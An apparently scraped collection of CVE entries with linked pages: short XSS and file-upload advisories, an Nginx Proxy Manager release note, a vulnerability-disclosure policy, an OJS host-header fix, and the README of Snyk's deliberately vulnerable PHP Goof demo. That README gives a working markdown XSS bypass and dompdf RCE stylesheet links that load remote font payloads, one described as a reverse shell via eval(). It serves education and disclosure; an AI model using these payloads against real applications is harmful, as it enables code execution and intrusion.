A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_user at Ecommerce-Website v1.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username text field.

CVE-2022-27436

Car Rental System v1.0 contains an arbitrary file upload vulnerability via the Add Car component which allows attackers to upload a webshell and execute arbitrary code.

CVE-2022-28062: CVEs/POC.md at main · D4rkP0w4r/CVEs

CVE-2022-28378: cms/CHANGELOG.md at develop · craftcms/cms

jc21.com Nginx Proxy Manager before 2.9.17 allows XSS during item deletion.

Compare

Choose a tag to compare

**v2.9.17**

![@jc21](https://avatars.githubusercontent.com/u/1518257?s=40&v=4) jc21 released this

· 2 commits to master since this release

v2.9.17

`063ac46`

This commit was created on GitHub.com and signed with GitHub’s **verified signature**.

GPG key ID: 4AEE18F83AFDEB23 Learn about vigilant mode.

Compare

Choose a tag to compare

**Changes**

*   Update resolvers.conf to break dns cache (thanks @omercnet)
*   Fix #1950 XSS when deleting items
*   Includes nginx-full pr 7 in base image: Added both lua-resty-http lua plugin and Crowdsec-Openresty-Bouncer (thanks @LePresidente)

**Docker images**

*   jc21/nginx-proxy-manager:latest
*   jc21/nginx-proxy-manager:2
*   jc21/nginx-proxy-manager:2.9.17

For future stability, please consider using `2.9.17` tag and following releases for this project using the "Watch" menu top right of this screen.

**Contributors**

*   ![@omercnet](https://avatars.githubusercontent.com/u/639682?v=4)
*   ![@LePresidente](https://avatars.githubusercontent.com/u/21981763?v=4)

omercnet and LePresidente

**Assets**2

*   Source code (zip)
*   Source code (tar.gz)

CVE-2022-28379: Release v2.9.17 · NginxProxyManager/nginx-proxy-manager

Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).

**PHP Goof - Snyk's vulnerable demo php app**

A vulnerable PHP demo todo application that is for demonstration and education purposes only, i take no responsibility for this being used with malicious intent nor should this be used for malicious intent (or be run in any product environment).

![PHP Goof](https://github.com/snyk-labs/php-goof/raw/main/images/screenshot.png)

**Requisites & Running**

*   PHP 7.1+
*   Mysql or MariaDB
*   Composer 2

Run composer install from the project root directory

Create mysql or mariaDB database and update the db.php file, with database details.

Import sql/database.sql file into the newly created database or run the following table create.

    CREATE TABLE `task` (
      `id` int(11) NOT NULL AUTO_INCREMENT,
      `title` varchar(255) NOT NULL,
      `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
      PRIMARY KEY (`id`)
    ) ENGINE=InnoDB AUTO_INCREMENT=76 DEFAULT CHARSET=utf8mb3;
    

Finally, Using the PHP built in server run the code from the root app directory

**Exploiting the vulnerabilities****Commonmark XSS Vulnerability**

SNYK-PHP-LEAGUECOMMONMARK-174004

    * Markdown link
    This is **markdown**
    
    * Markdown link
    [Snyk](https://snyk.io/)
    
    * Failed XSS
    [Gotcha](javascript:alert(1))
    
    * Failed XSS despite URL encoding
    [Gotcha](javascript&#58;alert(1&#41;)
    
    * Successfull XSS using vuln and browser interpretation 
    [Gotcha](javascript&amp;colon;alert%28&#039;Gotcha&#039;%29)
    

**PHPMailer**

SNYK-PHP-PHPMAILERPHPMAILER-1311001

Uses the `validateAddress()` exploit from PHPMailer 6.4.1 to execute the global `PHP()` function by default. If no argument is passed into the `validateAddress()` function, which isnt in this demo, PHPMailer sets "PHP" as the default value and runs it if its available in the scope.

To run click the email icon next to a line entry to send an email reminder.

Note: No emails will actually send or are being stored, only validating the email address entered into the input using the PHPMailer library.

**dompdf remote code execution**

SNYK-PHP-DOMPDFDOMPDF-2428942

Read more about this Vulnerability

This vulnerability is using dompdf library version 1.2.0 and allows for remote code execution on the target application. In this app there is a custom font called gotcha-normal.otf which has `<?php phpinfo(); ?>` loaded into the copyright font meta.

The font file is then referenced as a `font-family` in the CSS file `gotcha.css` which is then injected into the dompdf html output via a stylesheet link.

Dompdf loads the style sheet and saves the custom font type to the dompdf font cache (and as part of the framework). This can then be remotely executed.

\*\*\* Note: in the CSS font-family, the font name needs to match the actual font name or this will not work.

To use this in this app, load the below code into a todo item and click pdf on its line entry, chicken and egg note that you will need to refresh the PDF with the file examples below so that the link generates into the pdf to click.

    <link rel=stylesheet href='https://raw.githubusercontent.com/snyk-labs/php-goof/main/exploits/gotcha.css'>
    

Additional, added an example that uses a reverse shell by using a php `eval()` in a font file leveraging the RCE exploit. This works the same as above but using the below CSS. To use it simply load any get variable into the url when the gotcha link is created in the pdf, example `...?test=phpinfo();`. Regular $\_GET references didnt work but `reset()` did which will pick up the first in the $ array and run it in `eval()`.

Note this uses a different font file and family in the exploit folder.

    <link rel=stylesheet href='https://raw.githubusercontent.com/snyk-labs/php-goof/main/exploits/rshell.css'>

CVE-2022-28368: GitHub - snyk-labs/php-goof: Snyk PHP Goof - A vulnerable PHP demo application

A blind self XSS vulnerability exists in RocketChat LiveChat <v1.9 that could allow an attacker to trick a victim pasting malicious code in their chat instance.

CVE-2022-21830

Unauthenticated users can access sensitive web URLs through GET request, which should be restricted to maintenance users only. A malicious attacker could use this sensitive information’s to launch further attacks on the system.

**Reporting a vulnerability**

The SICK PSIRT aims to process every vulnerability with confidentiality and professionalism together with the respective reporters. Neither a non-disclosure agreement (NDA) nor another type of contract is necessary or a requirement for collaboration.

Coordinated vulnerability reports from all members of the security community are greatly appreciated. These include security researchers, universities, CERTs, business partners, authorities, industry associations and suppliers.

Many SICK AG products fulfill important protective functions and are used in critical infrastructures. SICK AG therefore asks for cooperation when dealing with the coordinated disclosure of vulnerabilities and also requests that vulnerability information not be disclosed prematurely.

SICK AG requests that as much information as possible is provided in a report in order to speed up processing. This information should contain the following:

*   **Contact information and availability**
*   **Affected product including model and version number**
*   **Classification of the vulnerability** (buffer overflow, XSS, …)
*   **Detailed description of the vulnerability** (with verification if possible)
*   **Effect of the vulnerability** (if know)
*   **Current level of awareness of the vulnerability** (are there plans to disclose it?)
*   **(Company) affiliation of the reporter** (if reporter is prepared to provide such information)
*   **CVSS score** (if known)

If more information is necessary for the inspection of a vulnerability, the SICK PSIRT will contact the reporter.

If the reporter would like, he/she will be publicly acknowledged after disclosing a new vulnerability.

CVE-2021-32503: The SICK Product Security Incident Response Team (SICK PSIRT)

A cross-site scripting (XSS) vulnerability in Totaljs commit 95f54a5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page Name text field when creating a new page.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-26565: Security Issue - Cross Site Scripting (Stored) · Issue #35 · totaljs/cms

Monthly release also addresses pair of stored XSS flaws

GitLab addresses critical account hijack bug

Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header.

**Description of problem**

OJS/OMP/OPS currently uses the `HTTP_HOST`, `SERVER_NAME`, and `HTTP_X_FORWARDED_HOST` headers to detect the current hostname for formulating absolute URLs.

Per https://portswigger.net/web-security/host-header, these headers may be user-controlled and thus not trustworthy. This could be used to e.g. send password reset emails with poisoned links that direct the user to a 3rd-party site, where the reset hash can be captured. (We are not currently aware of another possible abuse via this mechanism.)

Thanks to Hemant Kashyap for reporting the issue.

**Solution**

The changes described here add support for a list of allowed host names to be provided in the config.inc.php configuration file. User-supplied values are checked against this list and only one of the listed values will be allowed.

**Affected versions**

This issue affects _all releases_ of OJS, OMP, and OPS versions 3.3.0-8 and older.

**How to resolve the issue**

1.  Update the code to support the new `allowed_hosts` setting. This can be done by any of the following...
    
    1.  Upgrade OJS, OMP, or OPS to version 3.3.0-9 or newer, _or_
    2.  If using git, update to the latest `stable-3_3_0` or `stable-3_2_1` branches, _or_
    3.  Apply the appropriate patch for your installation:
    
    *   3.3.0-9 and newer: Not affected.
    *   3.3.0-1 through 3.3.0-8: OJS OMP OPS
    *   3.2.0 or 3.2.1: OJS OMP OPS
    *   3.0 to 3.1.x: Upgrading is recommended, but you may apply this untested patch (for OJS and OMP).
    *   2.x: No patch available; upgrading is recommended.
2.  Add an `allowed_hosts` setting to the `general` section of your `config.inc.php` configuration file. Here is the description/example from `config.TEMPLATE.inc.php`:

    ; Restrict the list of allowed hosts to prevent HOST header injection.
    ; See docs/README.md for more details. The list should be JSON-formatted.
    ; An empty string indicates that all hosts should be trusted (not recommended!)
    ; Example:
    ; allowed_hosts = '["myjournal.tld", "anotherjournal.tld", "mylibrary.tld"]'
    allowed_hosts = ''
    

3.  You can test whether or not the configuration is working by intentionally misconfiguring `allowed_hosts`. Attempting to load a page from the software should result in a `400 Bad Request` error page.

**Commits/pull requests**

(This is for tracking development work on the issue; you likely don't need to know this.)

PRs/commits:

*   `main`:
    *   #7656
    *   pkp/ojs#3291
    *   omp: pkp/omp@5703941
    *   ops: pkp/ops@586c281
*   `stable-3_3_0`:
    *   pkp-lib: #7650
    *   ojs: pkp/ojs#3289
    *   omp: pkp/omp@006ebf9
    *   ops: pkp/ops@f75f58a
*   `stable-3_2_1`:
    *   pkp-lib: 9abc0f7
    *   ojs: pkp/ojs@1dfad48
    *   omp: pkp/omp@29c4595
    *   ops: pkp/ops@a2e7bb8

Tag

#xss